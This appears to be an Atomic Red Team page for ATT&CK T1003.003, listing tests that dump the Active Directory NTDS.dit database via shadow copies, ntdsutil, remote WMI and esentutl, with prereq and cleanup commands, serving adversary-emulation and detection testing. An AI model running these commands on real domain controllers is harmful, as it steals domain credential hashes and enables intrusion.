Try it using Invoke-Atomic

OS Credential Dumping: NTDS

Description from ATT&CK

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

  • Volume Shadow Copy
  • secretsdump.py
  • Using the in-built Windows tool, ntdsutil.exe
  • Invoke-NinjaCopy

Atomic Tests

Atomic Test #1 - Create Volume Shadow Copy with vssadmin

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

Supported Platforms: windows

auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon) string C:

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
vssadmin.exe create shadow /for=#{drive_letter}

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller

Check Prereq Commands:

1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

Get Prereq Commands:

1
echo Sorry, Promoting this machine to a Domain Controller must be done manually

Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.

Supported Platforms: windows

auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03

Inputs:

Name Description Type Default Value
vsc_name Name of Volume Shadow Copy string \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path Path for extracted NTDS.dit path C:\Windows\Temp

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE

Cleanup Commands:

1
2
3
del "#{extract_path}\ntds.dit"        >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller

Check Prereq Commands:

1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

Get Prereq Commands:

1
echo Sorry, Promoting this machine to a Domain Controller must be done manually

Description: Volume shadow copy must exist

Check Prereq Commands:

1
if not exist #{vsc_name} (exit /b 1)

Get Prereq Commands:

1
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement

Description: Extract path must exist

Check Prereq Commands:

1
if not exist #{extract_path} (exit /b 1)

Get Prereq Commands:

1
mkdir #{extract_path}

Atomic Test #3 - Dump Active Directory Database with NTDSUtil

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication.

Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.

Supported Platforms: windows

auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723

Inputs:

Name Description Type Default Value
output_folder Path where resulting dump should be placed path C:\Windows\Temp\ntds_T1003

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q

Cleanup Commands:

1
rmdir /q /s #{output_folder} >nul 2>&1

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller

Check Prereq Commands:

1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

Get Prereq Commands:

1
echo Sorry, Promoting this machine to a Domain Controller must be done manually

Atomic Test #4 - Create Volume Shadow Copy with WMI

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

Supported Platforms: windows

auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon and backslash) string C:\

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
wmic shadowcopy call create Volume=#{drive_letter}

Dependencies: Run with command_prompt!

Description: Target must be a Domain Controller

Check Prereq Commands:

1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT

Get Prereq Commands:

1
echo Sorry, Promoting this machine to a Domain Controller must be done manually

Atomic Test #5 - Create Volume Shadow Copy remotely with WMI

This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

Supported Platforms: windows

auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon and backslash) string C:\
target_host IP Address / Hostname you want to target string localhost

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}

Dependencies: Run with command_prompt!

Description: Target must be a reachable Domain Controller, and current context must be domain admin

Check Prereq Commands:

1
wmic /node:"#{target_host}" shadowcopy list brief

Get Prereq Commands:

1
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)

Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl

This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.

Supported Platforms: windows

auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865

Inputs:

Name Description Type Default Value
source_path File to shadow copy string c:\windows\ntds\ntds.dit
target_path Target path of the result file string c:\ntds.dit
target_host IP Address / Hostname you want to target string localhost

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"

Dependencies: Run with command_prompt!

Description: Target must be a reachable Domain Controller, and current context must be domain admin

Check Prereq Commands:

1
wmic /node:"#{target_host}" shadowcopy list brief

Get Prereq Commands:

1
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)

Atomic Test #7 - Create Volume Shadow Copy with Powershell

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

Supported Platforms: windows

auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon) string C:\

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')

This test is intended to be run on a domain Controller.

The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.

Supported Platforms: windows

auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702

Inputs:

Name Description Type Default Value
drive_letter Drive letter to source VSC (including colon) string C:
symlink_path symlink path string C:\Temp\vssstore

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Atomic Test #9 - Create Volume Shadow Copy with diskshadow

This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit

Supported Platforms: windows

auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7

Inputs:

Name Description Type Default Value
filename Location of the script Path PathToAtomicsFolder\T1003.003\src\diskshadow.txt

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
mkdir c:\exfil
diskshadow.exe /s #{filename}

source